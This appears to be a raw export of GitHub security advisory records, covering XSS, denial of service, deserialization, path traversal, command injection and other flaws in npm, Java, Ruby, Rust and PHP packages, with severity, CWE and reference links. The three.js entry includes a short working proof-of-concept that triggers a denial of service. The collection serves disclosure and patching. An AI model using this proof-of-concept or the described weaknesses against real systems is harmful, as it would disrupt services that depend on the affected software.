Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. | {'CVE-2022-23564'} | 2022-02-11T15:07:07Z | 2022-02-09T23:55:28Z | MODERATE | 6.5 | {'CWE-617'} | {'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-8rcj-c8pj-v3m3', 'https://github.com/advisories/GHSA-8rcj-c8pj-v3m3', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23564', 'https://github.com/tensorflow/tensorflow/commit/14fea662350e7c26eb5fe1be2ac31704e5682ee6'} | null |
GHSA | GHSA-qw96-mm2g-c8m7 | Next.js has cross site scripting (XSS) vulnerability via the 404 or 500 /_error page | Next.js 7.0.0 and 7.0.1 has XSS via the 404 or 500 /_error page. | {'CVE-2018-18282'} | 2022-04-26T18:43:28Z | 2018-10-15T21:43:12Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/zeit/next.js/releases/tag/7.0.2', 'https://github.com/advisories/GHSA-qw96-mm2g-c8m7', 'https://nvd.nist.gov/vuln/detail/CVE-2018-18282'} | null |
GHSA | GHSA-5fg8-2547-mr8q | Misinterpretation of malicious XML input | ### Impact
xmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications.
### Patches
Update to one of the fixed versions of `@xmldom/xmldom` (`>=0.7.0`)
See issue #271 for the status of publishing `xmldom` to npm or join #270 for Q&A/discussion until it's resolved.
### Workarounds
Downstream applications can validate the input and reject the maliciously crafted documents.
### References
Similar to this one reported on the Go standard library:
- https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/
- https://mattermost.com/blog/securing-xml-implementations-across-the-web/
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [`xmldom/xmldom`](https://github.com/xmldom/xmldom)
* Email us: send an email to **all** addresses that are shown by `npm owner ls @xmldom/xmldom`
| {'CVE-2021-32796'} | 2022-01-04T19:36:30Z | 2021-08-03T16:57:05Z | MODERATE | 6.5 | {'CWE-116'} | {'https://mattermost.com/blog/securing-xml-implementations-across-the-web/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32796', 'https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/', 'https://github.com/xmldom/xmldom/security/advisories/GHSA-5fg8-2547-mr8q', 'https://github.com/xmldom/xmldom/commit/7b4b743917a892d407356e055b296dcd6d107e8b', 'https://www.npmjs.com/package/@xmldom/xmldom', 'https://github.com/advisories/GHSA-5fg8-2547-mr8q'} | null |
GHSA | GHSA-f9cm-p3w6-xvr3 | Denial-of-Service Extended Event Loop Blocking in qs | Versions prior to 1.0.0 of `qs` are affected by a denial of service vulnerability that results from excessive recursion in parsing a deeply nested JSON string.
## Recommendation
Update to version 1.0.0 or later | {'CVE-2014-10064'} | 2021-01-08T18:53:40Z | 2018-10-09T00:38:48Z | HIGH | 0 | {'CWE-400'} | {'https://nodesecurity.io/advisories/28', 'https://www.npmjs.com/advisories/28', 'https://github.com/advisories/GHSA-f9cm-p3w6-xvr3', 'https://nvd.nist.gov/vuln/detail/CVE-2014-10064'} | null |
GHSA | GHSA-9xcj-c8cr-8c3c | In Apache Tomcat, when using FORM authentication there was a narrow window where an attacker could perform a session fixation attack | When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability. | {'CVE-2019-17563'} | 2021-08-19T16:14:17Z | 2019-12-26T18:22:26Z | HIGH | 7.5 | {'CWE-384'} | {'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://www.debian.org/security/2020/dsa-4680', 'https://security.netapp.com/advisory/ntap-20200107-0001/', 'https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html', 'https://lists.apache.org/thread.html/8b4c1db8300117b28a0f3f743c0b9e3f964687a690cdf9662a884bbd%40%3Cannounce.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/reb9a66f176df29b9a832caa95ebd9ffa3284e8f4922ec4fa3ad8eb2e@%3Cissues.cxf.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00013.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-17563', 'https://security.gentoo.org/glsa/202003-43', 'https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E', 'https://www.debian.org/security/2019/dsa-4596', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://github.com/advisories/GHSA-9xcj-c8cr-8c3c', 'https://seclists.org/bugtraq/2019/Dec/43', 'https://lists.debian.org/debian-lts-announce/2020/01/msg00024.html', 'https://usn.ubuntu.com/4251-1/'} | null |
GHSA | GHSA-fq6p-x6j3-cmmq | Denial of service in three | This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms") | {'CVE-2020-28496'} | 2021-03-01T19:57:16Z | 2021-03-01T19:57:16Z | HIGH | 0 | {'CWE-400'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-28496', 'https://github.com/advisories/GHSA-fq6p-x6j3-cmmq', 'https://snyk.io/vuln/SNYK-JS-THREE-1064931', 'https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e', 'https://github.com/mrdoob/three.js/issues/21132', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972'} | null |
GHSA | GHSA-8948-ffc6-jg52 | Insecure Default Configuration in redbird | Versions of `redbird` prior to 0.9.1 have a vulnerable default configuration of allowing TLS 1.0 connections on `lib/proxy.js`. The package does not provide an option to disable TLS 1.0 which is deprecated and vulnerable.
## Recommendation
Upgrade to version 0.9.1 or later. | null | 2021-08-04T20:58:53Z | 2019-06-06T15:32:21Z | MODERATE | 4.2 | {'CWE-20'} | {'https://github.com/OptimalBits/redbird/pull/207', 'https://www.npmjs.com/advisories/828', 'https://github.com/OptimalBits/redbird/commit/39c7a2da84a2ddddfe046ea80e98800518920516', 'https://github.com/advisories/GHSA-8948-ffc6-jg52', 'https://snyk.io/vuln/SNYK-JS-REDBIRD-174455'} | null |
GHSA | GHSA-qmqc-x3r4-6v39 | Polymorphic deserialization of malicious object in jackson-databind | A flaw was discovered in FasterXML jackson-databind in all versions before 2.9.10 and 2.10.0, where it would permit polymorphic deserialization of malicious objects using the xalan JNDI gadget when used in conjunction with polymorphic type handling methods such as `enableDefaultTyping()` or when @JsonTypeInfo is using `Id.CLASS` or `Id.MINIMAL_CLASS` or in any other way which ObjectMapper.readValue might instantiate objects from unsafe sources. An attacker could use this flaw to execute arbitrary code. | {'CVE-2019-14893'} | 2021-02-25T20:18:58Z | 2020-05-15T18:59:07Z | HIGH | 0 | {'CWE-502'} | {'https://security.netapp.com/advisory/ntap-20200327-0006/', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://github.com/FasterXML/jackson-databind/issues/2469', 'https://access.redhat.com/errata/RHSA-2020:0729', 'https://nvd.nist.gov/vuln/detail/CVE-2019-14893', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://github.com/FasterXML/jackson-databind/commit/998efd708284778f29d83d7962a9bd935c228317', 'https://github.com/advisories/GHSA-qmqc-x3r4-6v39', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14893'} | null |
GHSA | GHSA-84j7-475p-hp8v | HTTP Response Splitting in Puma | In Puma (RubyGem) before 4.3.2 and 3.12.3, if an application using Puma allows untrusted input in a response header,
an attacker can use newline characters (i.e. `CR`, `LF` or`/r`, `/n`) to end the header and inject malicious content,
such as additional headers or an entirely new response body. This vulnerability is known as HTTP Response Splitting.
While not an attack in itself, response splitting is a vector for several other attacks, such as cross-site scripting (XSS).
This is related to CVE-2019-16254, which fixed this vulnerability for the WEBrick Ruby web server.
This has been fixed in versions 4.3.2 and 3.12.3 by checking all headers for line endings and rejecting headers with those characters. | {'CVE-2020-5247'} | 2021-01-08T20:28:16Z | 2020-02-28T16:53:55Z | MODERATE | 6.5 | {'CWE-113'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-5247', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BMJ3CGZ3DLBJ5WUUKMI5ZFXFJQMXJZIK/', 'https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v', 'https://www.ruby-lang.org/en/news/2019/10/01/http-response-splitting-in-webrick-cve-2019-16254', 'https://owasp.org/www-community/attacks/HTTP_Response_Splitting', 'https://github.com/puma/puma/commit/c36491756f68a9d6a8b3a49e7e5eb07fe6f1332f', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DIHVO3CQMU7BZC7FCTSRJ33YDNS3GFPK/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NJ3LL5F5QADB6LM46GXZETREAKZMQNRD/', 'https://github.com/advisories/GHSA-84j7-475p-hp8v'} | null |
GHSA | GHSA-gc94-6w89-hpqr | Command Injection in fs-path | All versions of `fs-path` are vulnerable to command injection is unsanitized user input is passed in.
## Recommendation
No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available. | null | 2021-09-16T20:59:59Z | 2019-06-12T16:37:07Z | HIGH | 0 | {'CWE-62', 'CWE-77'} | {'https://www.npmjs.com/advisories/661', 'https://github.com/advisories/GHSA-gc94-6w89-hpqr', 'https://hackerone.com/reports/324491', 'https://nodesecurity.io/advisories/661'} | null |
GHSA | GHSA-p5w7-qmq6-pmjr | Users able to query database metadata in Apache Superset | In Apache Incubator Superset before 0.31 user could query database metadata information from a database he has no access to, by using a specially crafted complex query. | {'CVE-2019-12413'} | 2021-08-19T19:28:39Z | 2020-02-26T19:55:32Z | MODERATE | 5.3 | {'CWE-200'} | {'https://github.com/advisories/GHSA-p5w7-qmq6-pmjr', 'https://nvd.nist.gov/vuln/detail/CVE-2019-12413', 'https://lists.apache.org/thread.html/85ab04f8c52df8c353ecfa0ecd2ff27fc07fb8ab7566a754349806be%40%3Cdev.superset.apache.org%3E', 'https://snyk.io/vuln/SNYK-PYTHON-APACHESUPERSET-558911'} | null |
GHSA | GHSA-jp4j-47f9-2vc3 | Integer Overflow or Wraparound in NATS Server | An integer overflow in NATS Server 2.0.0 allows a remote attacker to crash the server by sending a crafted request. | {'CVE-2019-13126'} | 2021-05-18T18:14:55Z | 2021-05-18T18:14:55Z | HIGH | 7.1 | {'CWE-190'} | {'https://github.com/advisories/GHSA-jp4j-47f9-2vc3', 'https://github.com/nats-io/nats-server/pull/1441', 'https://github.com/nats-io/nats-server/pull/1053', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13126', 'https://www.twistlock.com/labs-blog/finding-dos-vulnerability-nats-go-fuzz-cve-2019-13126/', 'https://github.com/nats-io/nats-server/commits/master', 'https://github.com/nats-io/nats-server/commit/07ef71ff98f45f8c2711be4aeaf484610d891dda'} | null |
GHSA | GHSA-w7wg-24g3-2c78 | Malicious Package in requset | All versions of `requset` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
## Recommendation
Remove the package from your dependencies and always ensure package names are typed correctly upon installation. | null | 2021-09-30T20:29:47Z | 2020-09-02T21:14:17Z | CRITICAL | 9.8 | {'CWE-506'} | {'https://github.com/advisories/GHSA-w7wg-24g3-2c78', 'https://www.npmjs.com/advisories/869'} | null |
GHSA | GHSA-gxmc-5wj3-jx64 | Cross-site scripting in application/controllers/dropbox.php in JustWriting | Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. | {'CVE-2021-41467'} | 2021-10-05T16:02:21Z | 2021-10-04T20:13:25Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/hjue/JustWriting/issues/106', 'https://github.com/advisories/GHSA-gxmc-5wj3-jx64', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41467', 'https://github.com/hjue/JustWriting/'} | null |
GHSA | GHSA-gp82-xr77-88f4 | Moderate severity vulnerability that affects radiant | There are multiple Persistent XSS vulnerabilities in Radiant CMS 1.1.4. They affect Personal Preferences (Name and Username) and Configuration (Site Title, Dev Site Domain, Page Parts, and Page Fields). | {'CVE-2018-7261'} | 2021-09-13T12:38:12Z | 2018-07-27T17:08:29Z | MODERATE | 5.4 | {'CWE-79'} | {'http://www.securityfocus.com/archive/1/541798/100/0/threaded', 'http://www.securityfocus.com/bid/103080', 'https://github.com/advisories/GHSA-gp82-xr77-88f4', 'https://nvd.nist.gov/vuln/detail/CVE-2018-7261'} | null |
GHSA | GHSA-mpgr-2cx9-327h | Information disclosure in SSB-DB | ### Impact
_What kind of vulnerability is it? Who is impacted?_
Servers running SSB-DB 20.0.0 (which is packaged with SSB-Server 16.0.0) must upgrade immediately.
**There is no evidence that other SSB apps are vulnerable or that this problem has been exploited in the wild.**
The `get()` method is supposed to only decrypt messages when you explicitly ask it to, but there's a bug where it's decrypting any message that it can. This means that it's returning the decrypted content of private messages, which a malicious peer could use to get access to private data. This only affects peers running SSB-DB@20.0.0 who also have private messages, and is only known to be exploitable if you're also running SSB-OOO (default in SSB-Server), which exposes a thin wrapper around `get()` to anonymous peers.
### Patches
_Has the problem been patched? What versions should users upgrade to?_
Yes, please upgrade to SSB-DB 20.0.1 (or SSB-Server 16.0.1) immediately.
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
You may be able to disable the most obvious attack vector, SSB-OOO, by disabling the plugin, but you should upgrade immediately anyway.
### For more information
If you have any questions or comments about this advisory, open an issue in [SSB-DB](https://github.com/ssbc/ssb-db/) | {'CVE-2020-4045'} | 2022-04-19T19:02:28Z | 2020-06-11T21:09:04Z | HIGH | 7.5 | {'CWE-200'} | {'https://github.com/advisories/GHSA-mpgr-2cx9-327h', 'https://github.com/ssbc/ssb-db/commit/43334d0871c9cc6220e0f6d6338499060f7761d4', 'https://nvd.nist.gov/vuln/detail/CVE-2020-4045', 'https://github.com/ssbc/ssb-db/security/advisories/GHSA-mpgr-2cx9-327h'} | null |
GHSA | GHSA-v76m-f5cx-8rg4 | Moderate severity vulnerability that affects DotNetNuke.Core | Cross-site scripting (XSS) vulnerability in DotNetNuke (DNN) before 7.4.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. | {'CVE-2015-1566'} | 2021-09-20T15:49:57Z | 2018-10-16T19:33:25Z | MODERATE | 0 | {'CWE-79'} | {'https://nvd.nist.gov/vuln/detail/CVE-2015-1566', 'https://github.com/advisories/GHSA-v76m-f5cx-8rg4', 'http://secunia.com/advisories/62832', 'http://www.dnnsoftware.com/platform/manage/security-center'} | null |
GHSA | GHSA-p8p6-rcp6-4mrm | Uncontrolled Recursion in Play Framework | In Play Framework 2.6.0 through 2.8.2, stack consumption can occur because of unbounded recursion during parsing of crafted JSON documents. | {'CVE-2020-26883'} | 2022-02-10T20:23:01Z | 2022-02-10T20:23:01Z | HIGH | 7.5 | {'CWE-674'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-26883', 'https://github.com/advisories/GHSA-p8p6-rcp6-4mrm', 'https://github.com/playframework/playframework/pull/10495', 'https://www.playframework.com/security/vulnerability/CVE-2020-26883-JsonParseUncontrolledRecursion'} | null |
GHSA | GHSA-vx5w-cxch-wwc9 | Path Traversal in f-serv | All versions of `f-serv` are vulnerable to Path Traversal. Due to insufficient input sanitization in URLs, attackers can access server files by using relative paths when fetching files.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available. | null | 2021-09-29T16:24:08Z | 2020-09-03T19:02:27Z | CRITICAL | 0 | {'CWE-22'} | {'https://github.com/advisories/GHSA-vx5w-cxch-wwc9', 'https://www.npmjs.com/advisories/1092'} | null |
GHSA | GHSA-p48w-vf3c-rqjx | Cross-Site Scripting in Bootstrap Package | ### Problem
It has been discovered that rendering content in the website frontend is vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability.
The following templates are affected by the vulnerability:
* `Resources/Private/Partials/ContentElements/Carousel/Item/CallToAction.html`
* `Resources/Private/Partials/ContentElements/Carousel/Item/Header.html`
* `Resources/Private/Partials/ContentElements/Carousel/Item/Text.html`
* `Resources/Private/Partials/ContentElements/Carousel/Item/TextAndImage.html`
* `Resources/Private/Partials/ContentElements/Header/SubHeader.html`
Users of the extension, who have overwritten the affected templates with custom code must manually apply the security fix as shown in [this Git commit](https://github.com/benjaminkott/bootstrap_package/commit/de3a568fc311d6712d9339643e51e8627c80530b).
### Solution
Update to version 7.1.2, 8.0.8, 9.0.4, 9.1.3, 10.0.10 or 11.0.3 of the Bootstrap Package that fix the problem described.
Updated version are available from the TYPO3 extension manager, Packagist and at https://extensions.typo3.org/extension/download/bootstrap_package/.
### Credits
Thanks to TYPO3 security team member Oliver Hader who reported and fixed the issue. | {'CVE-2021-21365'} | 2022-04-19T19:02:55Z | 2021-04-29T21:51:21Z | MODERATE | 5.4 | {'CWE-79'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-21365', 'https://github.com/advisories/GHSA-p48w-vf3c-rqjx', 'https://github.com/benjaminkott/bootstrap_package/commit/de3a568fc311d6712d9339643e51e8627c80530b', 'https://github.com/benjaminkott/bootstrap_package/security/advisories/GHSA-p48w-vf3c-rqjx', 'https://typo3.org/security/advisory/typo3-ext-sa-2021-007'} | null |
GHSA | GHSA-qpw2-xchm-655q | Out-of-Bounds read in stringstream | Versions less than 0.0.6 of the Node.js stringstream module are vulnerable to an out-of-bounds read because of allocation of uninitialized buffers when a number is passed in the input stream (when using Node.js 4.x).
# WITHDRAWN
This is a duplicate of GHSA-mf6x-7mm4-x2g7 | null | 2022-01-06T20:31:08Z | 2022-01-06T20:31:01Z | MODERATE | 6.5 | {'CWE-125'} | {'https://nvd.nist.gov/vuln/detail/CVE-2018-21270', 'https://www.npmjs.com/advisories/664', 'https://github.com/mhart/StringStream/issues/7', 'https://github.com/advisories/GHSA-qpw2-xchm-655q', 'https://hackerone.com/reports/321670', 'https://github.com/mhart/StringStream/commit/2f4a9d496f94b0880e01a26857aa266a5a3ef274'} | null |
GHSA | GHSA-93g4-3phc-g4xw | SQL injection in Apache DolphinScheduler | In Apache DolphinScheduler before 1.3.6 versions, authorized users can use SQL injection in the data source center. (Only applicable to MySQL data source with internal login account password) | {'CVE-2021-27644'} | 2021-11-03T17:30:18Z | 2021-11-03T17:30:18Z | HIGH | 8.8 | {'CWE-89'} | {'http://www.openwall.com/lists/oss-security/2021/11/01/3', 'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6@%3Cdev.dolphinscheduler.apache.org%3E', 'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6%40%3Cdev.dolphinscheduler.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27644', 'https://github.com/advisories/GHSA-93g4-3phc-g4xw'} | null |
GHSA | GHSA-f5fj-7265-jxhj | Information Exposure | Gitea version prior to version 1.5.1 contains a CWE-200 vulnerability that can result in Exposure of users private email addresses. This attack appear to be exploitable via Watch a repository to receive email notifications. Emails received contain the other recipients even if they have the email set as private. This vulnerability appears to have been fixed in 1.5.1. | {'CVE-2018-1000803'} | 2022-04-12T22:02:36Z | 2022-02-15T01:57:18Z | MODERATE | 5.3 | {'CWE-200'} | {'https://github.com/go-gitea/gitea/pull/4664', 'https://github.com/go-gitea/gitea/commit/194a11eb110cd98fc2ba52861abf7770db6885a3', 'https://github.com/go-gitea/gitea/pull/4664/files#diff-146e0c2b5bb1ea96c9fb73d509456e57', 'https://github.com/advisories/GHSA-f5fj-7265-jxhj', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000803'} | null |
GHSA | GHSA-w89r-qch4-8jv5 | Out-of-bounds write | A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937. | {'CVE-2019-0912'} | 2021-03-29T20:59:59Z | 2021-03-29T20:59:59Z | HIGH | 7.5 | {'CWE-787'} | {'https://nvd.nist.gov/vuln/detail/CVE-2019-0912', 'https://github.com/chakra-core/ChakraCore/commit/936a5af1c07e0fdec9aab85c05339dabe4aaeeb1', 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0912', 'https://github.com/advisories/GHSA-w89r-qch4-8jv5'} | null |
GHSA | GHSA-mhfv-8rc9-w38c | Arbitrary shell execution | Uses of shell_exec() and exec() were not escaping filenames and configuration settings in most cases | null | 2022-03-26T00:31:53Z | 2022-03-26T00:06:00Z | HIGH | 0 | null | {'https://github.com/squizlabs/PHP_CodeSniffer/releases/tag/2.8.1', 'https://github.com/advisories/GHSA-mhfv-8rc9-w38c', 'https://github.com/FriendsOfPHP/security-advisories/blob/master/squizlabs/php_codesniffer/2017-03-01.yaml'} | null |
GHSA | GHSA-c99r-67x4-whj6 | Reflected cross-site scripting in development mode handler in Vaadin 14, 15-19 | URL encoding error in development mode handler in `com.vaadin:flow-server` versions 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows local user to execute arbitrary JavaScript code by opening crafted URL in browser.
- https://vaadin.com/security/cve-2021-33604 | {'CVE-2021-33604'} | 2021-10-05T17:29:13Z | 2021-06-28T16:56:07Z | LOW | 2.5 | {'CWE-172'} | {'https://vaadin.com/security/cve-2021-33604', 'https://github.com/vaadin/flow/pull/11099', 'https://github.com/vaadin/platform/security/advisories/GHSA-c99r-67x4-whj6', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33604', 'https://github.com/advisories/GHSA-c99r-67x4-whj6'} | null |
GHSA | GHSA-3933-wvjf-pcvc | Out of bounds access in lucet-runtime-internals | An issue was discovered in the lucet-runtime-internals crate before 0.5.1 for Rust. It mishandles sigstack allocation. Guest programs may be able to obtain sensitive information, or guest programs can experience memory corruption. | {'CVE-2020-35859'} | 2021-08-25T20:46:16Z | 2021-08-25T20:46:16Z | CRITICAL | 9.1 | {'CWE-787', 'CWE-125'} | {'https://github.com/bytecodealliance/lucet/pull/401', 'https://rustsec.org/advisories/RUSTSEC-2020-0004.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35859', 'https://github.com/advisories/GHSA-3933-wvjf-pcvc'} | null |
GHSA | GHSA-jmx8-355m-8vwh | Unauthorized client-side property update in UIDL request handler in Vaadin 10 and 11 | Missing check in UIDL request handler in com.vaadin:flow-server versions 1.0.0 through 1.0.5 (Vaadin 10.0.0 through 10.0.7, and 11.0.0 through 11.0.2) allows attacker to update element property values via crafted synchronization message.
- https://vaadin.com/security/cve-2018-25007 | {'CVE-2018-25007'} | 2021-04-26T20:07:03Z | 2021-04-19T14:53:09Z | LOW | 2.6 | {'CWE-754'} | {'https://github.com/vaadin/flow/security/advisories/GHSA-jmx8-355m-8vwh', 'https://github.com/vaadin/flow/pull/4774', 'https://nvd.nist.gov/vuln/detail/CVE-2018-25007', 'https://github.com/advisories/GHSA-jmx8-355m-8vwh', 'https://vaadin.com/security/cve-2018-25007'} | null |
GHSA | GHSA-wmg4-8cp2-hpg9 | Denial of service attack via memory exhaustion | ### Impact
Sydent does not limit the size of requests it receives from HTTP clients. A malicious user could send an HTTP request with a very large body, leading to disk space exhaustion and denial of service.
Sydent also does not limit response size for requests it makes to remote Matrix homeservers. A malicious homeserver could return a very large response, again leading to memory exhaustion and denial of service.
This affects any server which accepts registration requests from untrusted clients.
### Patches
Patched by 89071a1, 0523511, f56eee3.
### Workarounds
Request sizes can be limited in an HTTP reverse-proxy.
There are no known workarounds for the problem with overlarge responses.
### For more information
If you have any questions or comments about this advisory, email us at security@matrix.org. | {'CVE-2021-29430'} | 2021-04-19T14:54:04Z | 2021-04-19T14:54:04Z | LOW | 0 | {'CWE-20', 'CWE-400'} | {'https://github.com/matrix-org/sydent/commit/0523511d2fb40f2738f8a8549868f44b96e5dab7', 'https://github.com/matrix-org/sydent/releases/tag/v2.3.0', 'https://github.com/matrix-org/sydent/commit/89071a1a754c69a50deac89e6bb74002d4cda19d', 'https://github.com/matrix-org/sydent/security/advisories/GHSA-wmg4-8cp2-hpg9', 'https://github.com/advisories/GHSA-wmg4-8cp2-hpg9', 'https://github.com/matrix-org/sydent/commit/f56eee315b6c44fdd9f6aa785cc2ec744a594428', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29430', 'https://pypi.org/project/matrix-sydent/'} | null |
GHSA | GHSA-mxhp-79qh-mcx6 | taffy can allow access to any data items in the DB | taffy through 2.6.2 allows attackers to forge adding additional properties into user-input processed by taffy which can allow access to any data items in the DB. taffy sets an internal index for each data item in its DB. However, it is found that the internal index can be forged by adding additional properties into user-input. If index is found in the query, taffyDB will ignore other query conditions and directly return the indexed data item. Moreover, the internal index is in an easily-guessable format (e.g., T000002R000001). As such, attackers can use this vulnerability to access any data items in the DB. | {'CVE-2019-10790'} | 2021-07-28T18:32:27Z | 2020-02-19T16:43:42Z | HIGH | 7.5 | {'CWE-668', 'CWE-20'} | {'https://snyk.io/vuln/SNYK-JS-TAFFY-546521', 'https://github.com/advisories/GHSA-mxhp-79qh-mcx6', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10790', 'https://www.npmjs.com/package/taffy'} | null |
GHSA | GHSA-mmc9-pwm7-qj5w | Unaligned memory access in rand_core | ### Impact
Affected versions of this crate violated alignment when casting byte slices to integer slices, resulting in undefined behavior. `rand_core::BlockRng::next_u64` and `rand_core::BlockRng::fill_bytes` are affected.
### Patches
The flaw was corrected by Ralf Jung and Diggory Hardy for `rand_core >= 0.4.2`.
### Workarounds
None.
### References
See [Rand's changelog](https://github.com/rust-random/rand/blob/master/rand_core/CHANGELOG.md#050---2019-06-06).
### For more information
If you have any questions or comments about this advisory, [open an issue in the Rand repository](https://github.com/rust-random/rand/issues/new/choose).
| {'CVE-2020-25576'} | 2022-05-02T20:41:52Z | 2021-08-25T20:56:50Z | CRITICAL | 9.8 | {'CWE-704'} | {'https://github.com/rust-random/rand/security/advisories/GHSA-mmc9-pwm7-qj5w', 'https://rustsec.org/advisories/RUSTSEC-2019-0035.html', 'https://github.com/advisories/GHSA-mmc9-pwm7-qj5w', 'https://github.com/rust-random/rand/blob/master/rand_core/CHANGELOG.md#050---2019-06-06'} | null |
GHSA | GHSA-536p-4pcj-5mr9 | raspap-webgui in RaspAP 2.6.6 allows attackers to execute commands as root because of the insecure sudoers permissions. | raspap-webgui in RaspAP 2.6.6 allows attackers to execute commands as root because of the insecure sudoers permissions. The www-data account can execute /etc/raspap/hostapd/enablelog.sh as root with no password; however, the www-data account can also overwrite /etc/raspap/hostapd/enablelog.sh with any executable content. | {'CVE-2021-38557'} | 2021-09-03T20:36:07Z | 2021-09-02T17:10:52Z | HIGH | 8.8 | {'CWE-732', 'CWE-276'} | {'https://github.com/advisories/GHSA-536p-4pcj-5mr9', 'https://github.com/RaspAP/raspap-webgui', 'https://nvd.nist.gov/vuln/detail/CVE-2021-38557', 'https://github.com/RaspAP/raspap-webgui/blob/fabc48c7daae4013b9888f266332e510b196a062/installers/raspap.sudoers', 'https://zerosecuritypenetrationtesting.com/?page_id=306'} | null |
